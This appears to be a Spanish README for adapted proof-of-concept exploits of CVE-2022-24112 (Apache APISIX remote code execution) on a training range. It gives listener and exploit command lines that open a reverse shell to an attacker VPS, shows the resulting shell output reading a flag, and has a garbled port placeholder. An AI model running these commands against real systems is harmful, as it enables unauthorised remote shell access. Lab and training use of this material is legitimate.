
CVE-2022-24112_POC
Colección de POC
Para el entorno del campo de tiro 春秋云境:CVE-2022-24112, modifiqué dos POC, adaptando ligeramente los POC de los maestros M4xSec y twseptian para el campo de tiro 春秋云境:
春秋云境:CVE-2022-24112:
Apache APISIX es un servicio de puerta de enlace de API de microservicios nativo de la nube de la Apache Foundation. Este software se implementa basado en OpenResty y etcd, con enrutamiento dinámico y carga en caliente de plugins, adecuado para la gestión de API en sistemas de microservicios. Existe una vulnerabilidad de ejecución remota de código en Apache APISIX, que se origina porque el plugin batch-requests no restringe eficazmente las solicitudes por lotes de los usuarios. Un atacante puede eludir la restricción de IP de la API de administración a través de esta vulnerabilidad, lo que fácilmente conduce a una ejecución remota de código.
POC original:
1、M4xSec:https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py
2、twseptian:https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py
Los POC modificados son los dos que escribí arriba, para entornos Linux y Windows respectivamente:
CVE-2022-24112_Linux_by_twseptian.py
Escucha en VPS: nc -lvvp 18888
Entra al directorio de POC y ejecuta:
Nota: Al añadir datos con -t, no es necesario escribir http:// o https://, solo el nombre de dominio y el puerto, como se muestra a continuación:
python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
Vuelve a consultar el VPS:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}
CVE-2022-24112_Windows_by_M4xSec.py
Escucha en VPS: nc -lvvp 18888
Entra al directorio de POC y ejecuta:
Nota: Al añadir datos con -t, no es necesario escribir http:// o https://, solo el nombre de dominio y el puerto, como se muestra a continuación:
python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
Vuelve a consultar el VPS:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}